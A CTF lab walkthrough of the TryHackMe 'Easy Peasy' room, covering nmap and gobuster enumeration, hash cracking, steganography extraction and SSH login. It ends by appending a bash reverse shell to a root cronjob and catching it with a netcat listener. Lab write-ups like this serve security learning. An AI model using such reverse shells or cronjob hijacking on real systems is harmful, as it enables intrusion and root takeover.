> For the complete documentation index, see [llms.txt](https://www.marialc.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.marialc.com/tryhackme-rooms/easypeasy.md).

# EasyPeasy

Try this challenge in [TryHackMe: **Easy Peasy**](https://tryhackme.com/r/room/easypeasyctf)

> I tried this easy CTF and below is my thought process on how I answered the questions and some notes for future reference. I got some hints from this Medium walkthrough: [TryHackMe: Easy Peasy Write-up by Kevin De Vijlder](https://medium.com/@kevin.de.vijlder/tryhackme-easy-peasy-write-up-b148ebed3c7e)

## Task 1: Enumeration through Nmap

### 1.1 How many ports are open?

Let's run a nmap scan to check the open ports on the IP assigned to us. Just r**eplace the 10.10.X.X to the IP given to you**.&#x20;

```bash
nmap -sT -p 1-65535 10.10.X.X
```

{% hint style="info" %}
**`-sT`** (TCP connect scan)
{% endhint %}

<figure><img src="/files/zRUroD6vW9WsLXxNxNY7" alt="" width="563"><figcaption></figcaption></figure>

*To answer the next two questions*, we’ll be running a nmap scan for the open ports:

### 1.2 What is the version of nginx?

### 1.3 What is running on the highest port?

```bash
nmap -p80,6498,65524 10.10.X.X -sV
```

<figure><img src="/files/3a7qJ8sb7Z0GPbe2yo57" alt="" width="563"><figcaption></figcaption></figure>

## Task 2: Compromising the machine

### 2.1 Using GoBuster, find flag 1.

Run gobuster for **<http://10.10.X.X/>**

{% code overflow="wrap" %}

```bash
gobuster dir -u http://10.10.X.X/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
```

{% endcode %}

<figure><img src="/files/lebhptIKgePn1gSc9aVV" alt="" width="563"><figcaption></figcaption></figure>

We found out that there is a /hidden directory. Let's try to run gobuster for **<http://10.10.X.X/hidden>**

{% code overflow="wrap" %}

```bash
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.X.X/hidden
```

{% endcode %}

<figure><img src="/files/7HpaYjwFgVWYoCavLzPk" alt="" width="563"><figcaption></figcaption></figure>

Go to **<http://10.10.X.X/hidden/whatever>**

<figure><img src="/files/i2gfPfRgw1akLfjaob1J" alt="" width="548"><figcaption></figcaption></figure>

Copy the hidden hash

To decrypt the hash, go to an online decrypter like [**https://hashes.com/en/decrypt/hash**](https://hashes.com/en/decrypt/hash) for faster results

<figure><img src="/files/myOjOjvAawmVHPGaKVYS" alt=""><figcaption></figcaption></figure>

### 2.2 Further enumerate the machine, what is flag 2?

Run gobuster for **<http://10.10.X.X:65524>**

{% code overflow="wrap" %}

```bash
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.X.X:65524
```

{% endcode %}

<figure><img src="/files/awMF2oJkAld3Cz6Qr8hr" alt="" width="543"><figcaption></figcaption></figure>

Check **`10.10.X.X:65524/robots.txt`**

<figure><img src="/files/04BZj2iBGj9p1Wd5aY50" alt="" width="446"><figcaption></figcaption></figure>

In the `User-Agent` field, there’s a hash

To find the type of the hash, use [hash-identifier](https://github.com/blackploit/hash-identifier) module

{% code lineNumbers="true" %}

```bash
cd /hash-identifier
python3 hash-id.py <insert hash here>
```

{% endcode %}

<figure><img src="/files/sUw11NI0M74w4SWLHa8y" alt="" width="563"><figcaption></figcaption></figure>

Decrypt hash using an online MD5 decrypter

<figure><img src="/files/lRq4RmMwKXhM3cTYonhU" alt=""><figcaption></figcaption></figure>

### 2.3 Crack the hash with easypeasy.txt, What is the flag 3?

From our nmap scan, go to **`http://10.10.X.X:65524`**

Flag 3 is written in plain sight on the web page

<figure><img src="/files/19cPyhNn941JXAl6UlQ3" alt=""><figcaption></figcaption></figure>

### 2.4 What is the hidden directory?

When you View the Page Source of **`http://10.10.X.X:65524`**, a hidden field will be seen that has a hash.

<figure><img src="/files/nlRgjT5Z6mwuKeyZJHTP" alt=""><figcaption></figcaption></figure>

We’ll use [CyberChef](https://gchq.github.io/CyberChef/) to decrypt hash from Base6X (explore options available in CyberChef)

<figure><img src="/files/ji2IGxmJ6RILb5P2iQlJ" alt="" width="552"><figcaption></figcaption></figure>

### 2.5 Using the wordlist that was provided to you in this task crack the hash what is the password?

When you go to the hidden directory, you’ll see a picture

<figure><img src="/files/LERR3f9ApjzIxejNgy5n" alt=""><figcaption></figcaption></figure>

Save the image with its default name

<figure><img src="/files/h6JG3tcXWtzZa4JezF7O" alt="" width="563"><figcaption></figcaption></figure>

We’ll use steganography to decode the message in the image

```bash
steghide --extract -sf bianrycodepixabay.jpg
```

But a passphrase is needed to decrypt this file

<figure><img src="/files/5u82RWr6SLb6mmJJHc0C" alt="" width="563"><figcaption></figcaption></figure>

Let’s try to **View the Page Source** of the image page to get some clues. We indeed retrieved a hash.&#x20;

<figure><img src="/files/iJJUZgf2ohUm8PmzWFqp" alt=""><figcaption></figcaption></figure>

Save the hash using the filename **hash.txt**

```bash
nano hash.txt
```

To decrypt the hash, use the **johntheripper** module

```bash
sudo /opt/john/john --wordlist=easypeasy.txt --format=gost hash.txt
```

<figure><img src="/files/WJ5OWrxyxLMCCqXEiTHp" alt="" width="557"><figcaption></figcaption></figure>

### 2.6 What is the password to login to the machine via SSH?

Going back to the **steghide** module, enter the passphrase that we got.&#x20;

<figure><img src="/files/BT8c69lStxBlghF97qW6" alt="" width="563"><figcaption></figcaption></figure>

A file **secrettext.txt** was extracted. Use this to view the contents of the file.&#x20;

```bash
cat secrettext.txt
```

<figure><img src="/files/4XzuAY32MK7cqh2yaHs3" alt="" width="557"><figcaption></figcaption></figure>

We’ll get a username **boring** and binary numbers that need to be decrypted

Use a Binary to Text converter tool online like this:

<https://www.rapidtables.com/convert/number/binary-to-ascii.html>

<figure><img src="/files/UsI1bqekOGBNvXEXLikS" alt="" width="417"><figcaption></figcaption></figure>

### 2.7 What is the user flag?

From our previous nmap scan, we’ll use the **port 6498 for the ssh access**

```bash
ssh boring@10.10.X.X -p 6498
```

<figure><img src="/files/4figWTjejbTLxJOhN5yS" alt="" width="563"><figcaption></figcaption></figure>

{% code lineNumbers="true" %}

```bash
ls
cat user.txt
```

{% endcode %}

<figure><img src="/files/3V09epiBHdeWo30vVmM1" alt="" width="563"><figcaption></figcaption></figure>

**From the Hint,** we got the term “Rotated”, which suggests that this may be encrypted with ROT13. Using CyberChef, we decrypt the flag.

<figure><img src="/files/qQY2TgfNUtcDREj07wgZ" alt="" width="503"><figcaption></figcaption></figure>

### 2.8 What is the root flag?

From the description of this room, we are expected to **escalate our privileges through a vulnerable cronjob**

```bash
cat /etc/crontab
```

<figure><img src="/files/BOcQw2GLfvIhhKRcJ5Rd" alt="" width="563"><figcaption></figcaption></figure>

The cron job is located in **/var/www**

{% code lineNumbers="true" %}

```bash
cd /var/www
ls -la
```

{% endcode %}

<figure><img src="/files/q23Grlp7nB9fKk4yrUVk" alt="" width="563"><figcaption></figcaption></figure>

We’ll see the cronjob **mysecretcronjob.sh** that said that will run as root.&#x20;

```bash
cat .mysecretcronjob.sh
```

<figure><img src="/files/dTBdGgHN7sUnfvPaOPsF" alt="" width="563"><figcaption></figcaption></figure>

We can set up a **netcat** **listener** **in our machine** to have a reverse shell since the cronjob has root privileges.

```bash
nc -lvnp 5556
```

<figure><img src="/files/TIPDQ9emlMfngG8DSRe5" alt="" width="563"><figcaption></figcaption></figure>

Let's craft our payload:

Get the reverse shell script from [pentestmonkey's reverse shell cheat sheet](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) then **replace the contents of mysecretcronjob.sh**&#x20;

```bash
echo "bash -i >& /dev/tcp/10.10.X.X/5556 0>&1" >> .mysecretcronjob.sh
```

*\*use your machine IP & port 5556*

<figure><img src="/files/Zi7VjhFRhPoMZVxn3evX" alt=""><figcaption></figcaption></figure>

Let's now wait for the cronjob to be executed to receive a shell

{% code lineNumbers="true" %}

```bash
cd /root
ls -la

```

{% endcode %}

<figure><img src="/files/dJQLMEMTac3GCEQfRloK" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/INvqkXRQaFalOkZQKGY2" alt="" width="563"><figcaption></figcaption></figure>

{% hint style="success" %}
We can see the flag in the **.root.txt** file.
{% endhint %}

```bash
cat .root.txt
```

<figure><img src="/files/NskdrjPNTP7zc1DE7QAk" alt="" width="554"><figcaption></figcaption></figure>
